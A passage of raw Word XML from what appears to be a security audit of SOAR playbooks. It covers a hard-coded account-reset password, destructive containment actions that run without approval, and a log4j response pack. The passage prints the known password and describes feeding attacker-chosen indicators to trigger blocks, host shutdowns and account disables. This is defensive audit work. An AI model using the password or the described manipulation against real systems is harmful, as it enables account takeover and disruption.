        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>573      "password": "Ch@ng3M3!123",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>574      "username": filtered_input_0_user_item[0],</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>575      "enable_access_keys": True,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: When an IAM account is re-enabled the playbook recreates the login profile with the fixed password </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Ch@ng3M3!123</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and re-enables access keys. Every account unlocked by this playbook gets the same, now-public (committed to a public content repo) password. If the account does not have "reset required on next login" enforced, or if an attacker reaches the console before the legitimate user, this is a predictable credential. Flagged by Bandit (B105) and detect-secrets. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: not injection; the weakness is the secret itself. Anyone with repo access knows the password of every account this playbook unlocks. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict: Exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as a weak/known credential if password-reset-on-login is not guaranteed by the connector. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>poc_logic.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> case 6, real output):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>enable user -&gt; {"password": "Ch@ng3M3!123", "username": "alice", "enable_access_keys": true}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>enable user -&gt; {"password": "Ch@ng3M3!123", "username": "bob",   "enable_access_keys": true}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t>: generate a random password per user and force reset; do not store any password in source:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>import secrets, string</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>def gen_pw(n=24):</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alphabet = string.ascii_letters + string.digits + "!@#$%^&amp;*()-_=+"</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return ''.join(secrets.choice(alphabet) for _ in range(n))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>parameters.append({"password": gen_pw(), "username": user, "enable_access_keys": True})</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t># and ensure the IAM login profile is created with PasswordResetRequired=True</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-798 Use of Hard-coded Credentials (2024 CWE Top 25 #22); CWE-259 Use of Hard-coded Password; CWE-521 Weak Password Requirements. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A07:2021 Identification and Authentication Failures. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1078 Valid Accounts, T1078.004 Valid Accounts: Cloud Accounts. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IA-5 Authenticator Management, IA-5(7) Authenticator Management | No Embedded Unencrypted Static Authenticators. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.AA Protect - Identity Management, Authentication, and Access Control. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.5.17 Authentication information. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR playbooks / Authentication and Password Management.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PB2-10 — Destructive automated response with no approval gate or protected-entity allow-list</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: High (CVSS v3.1 base 7.4). Exploitability: Exploitable (block_indicators, delete_detected_files).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/block_indicators.py:41,63,85; delete_detected_files.py:75,104; malware_hunt_and_contain.py:66,226-233; ransomware_investigate_and_contain.py:43,66,112,196,221,270</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>block_indicators.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>block_ip_1:41</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>block_hash_2:63</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>block_domain_1:85</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">(fired from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>on_start</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> filters, no prompt).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>delete_detected_files.py:75,104</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (auto more+del, no prompt) — see PB2-04.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>malware_hunt_and_contain.py:66</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>logoff user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>:126/128</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> create ticket, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>:229-232</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">callback auto-launches </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>disable_user_1</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>logoff_user_1</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>shutdown_system_1</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>block_hash_3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>:326,:143,:44,:349</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) once VT positives &gt;10; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>no prompt</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ransomware_investigate_and_contain.py:43</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> quarantine, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>:66</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> disable user, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>:112</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">block ip, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>:196/270</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> block hash, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>:221</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> terminate process — all auto, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>no prompt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: These playbooks take destructive containment actions (firewall block, DNS block, EDR hash block, disable AD account, force logoff, host shutdown, quarantine, process kill) driven directly by attacker-influenced reputation data with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>no human approval and no allow-list of protected entities</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. An attacker who controls the input (a spoofed file hash matching a legitimate signed binary, a legitimate corporate domain/IP placed in an artifact, or a VT false-positive) can weaponise the SOC's own automation to: block a legitimate domain/CDN/IP (availability DoS), disable or log off real users including admins, shut down production hosts, or push a legitimate-file hash to an EDR blocklist. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>fileHash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>destinationAddress</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>destinationDnsDomain</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>hostname</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> all CEF/attacker-chosen. Verdict: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>block_indicators</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>delete_detected_files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Conditionally exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for malware/ransomware (needs VT/sandbox verdict ≥ threshold, which an attacker can satisfy by submitting a genuinely-malicious-looking file whose *hostname/user fields* name a victim). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>block_indicators.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> has no </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>prompt2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> anywhere (grep: zero prompts in file); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>malware_hunt_and_contain.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>hunt_file_2_callback:226-233</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> calls </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>disable_user_1</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>shutdown_system_1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> directly. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ransomware_investigate_and_contain.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>filter_1:70-88</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> fans out to block/quarantine with no prompt. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: insert a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>phantom.prompt2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> approval before every destructive action; maintain allow-lists (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>protected_users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>protected_hosts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>allowlisted_domains</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>allowlisted_ips</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, signed-binary hash allow-list) and filter them out *before* acting; cap blast radius (e.g. refuse to disable accounts tagged admin, refuse to shut down assets above a criticality threshold). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aws_disable_user_accounts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>crowdstrike_malware_triage</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> already show the correct prompt+allowlist pattern.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-862 Missing Authorization (2024 CWE Top 25 #9); CWE-841. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A01:2021 Broken Access Control. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1531 Account Access Removal, T1489 Service Stop, T1562.001 Impair Defenses: Disable or Modify Tools. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AC-3 Access Enforcement, CM-5 Access Restrictions for Change, SI-4 System Monitoring. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.AA Protect - Identity Management, Authentication, and Access Control, RS.MI Respond - Incident Mitigation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.2 Privileged access rights. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR playbooks / Access Control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PB2-09 — Attacker-steerable host shutdown and network isolation in the log4j respond pack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: High (CVSS v3.1 base 7.1). Exploitability: Conditionally exploitable (analyst confirms attacker-chosen hosts).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/internal_host_ssh_log4j_respond.py:435,471,507; playbooks/internal_host_winrm_log4j_respond.py:438,473,508</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>(</w:t>
